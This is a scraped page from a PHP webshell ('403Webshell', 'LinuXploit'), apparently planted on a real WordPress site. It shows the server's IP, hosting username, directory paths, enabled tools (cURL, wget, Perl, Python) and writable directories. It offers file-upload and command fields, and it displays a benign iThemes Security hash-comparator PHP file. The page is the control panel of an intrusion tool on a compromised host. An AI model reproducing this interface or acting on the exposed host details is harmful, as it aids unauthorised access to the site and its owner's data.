403Webshell
Server IP : 104.21.14.103  /  Your IP : 18.119.248.44
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/giankuin/dietcontrungnhanh.com/wp-content/plugins/ithemes-security-pro/pro/online-files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/giankuin/dietcontrungnhanh.com/wp-content/plugins/ithemes-security-pro/pro/online-files/comparator-ithemes.php
<?php

/**
 * Class ITSEC_File_Change_Hash_Comparator_iThemes
 */
class ITSEC_File_Change_Hash_Comparator_iThemes implements ITSEC_File_Change_Hash_Comparator_Loadable {

	/** @var array */
	private $hashes = array();

	/**
	 * @inheritdoc
	 */
	public function supports_package( ITSEC_File_Change_Package $package ) {
		return $package instanceof ITSEC_File_Change_Package_iThemes;
	}

	/**
	 * @inheritdoc
	 */
	public function has_hash( $relative_path, ITSEC_File_Change_Package $package ) {
		return isset( $this->hashes[ $package->get_identifier() ][ $relative_path ] );
	}

	/**
	 * @inheritdoc
	 */
	public function hash_matches( $actual_hash, $relative_path, ITSEC_File_Change_Package $package ) {

		$hashes = (array) $this->hashes[ $package->get_identifier() ][ $relative_path ];

		foreach ( $hashes as $hash ) {
			if ( $hash === $actual_hash ) {
				return true;
			}
		}

		return false;
	}

	/**
	 * @inheritdoc
	 */
	public function load( ITSEC_File_Change_Package $package ) {
		if ( ! $hashes = ITSEC_Online_Files_Utility::get_ithemes_hashes( $package->get_identifier(), $package->get_version() ) ) {
			throw ITSEC_File_Change_Hash_Loading_Failed_Exception::create_for( $package, $this );
		}

		$this->hashes[ $package->get_identifier() ] = $hashes;
	}

	/**
	 * @inheritdoc
	 */
	public function get_load_cost( ITSEC_File_Change_Package $package ) {
		if ( false !== ITSEC_Online_Files_Utility::get_cached_ithemes_hashes( $package->get_identifier(), $package->get_version() ) ) {
			return self::CACHED;
		}

		return self::EXTERNAL;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit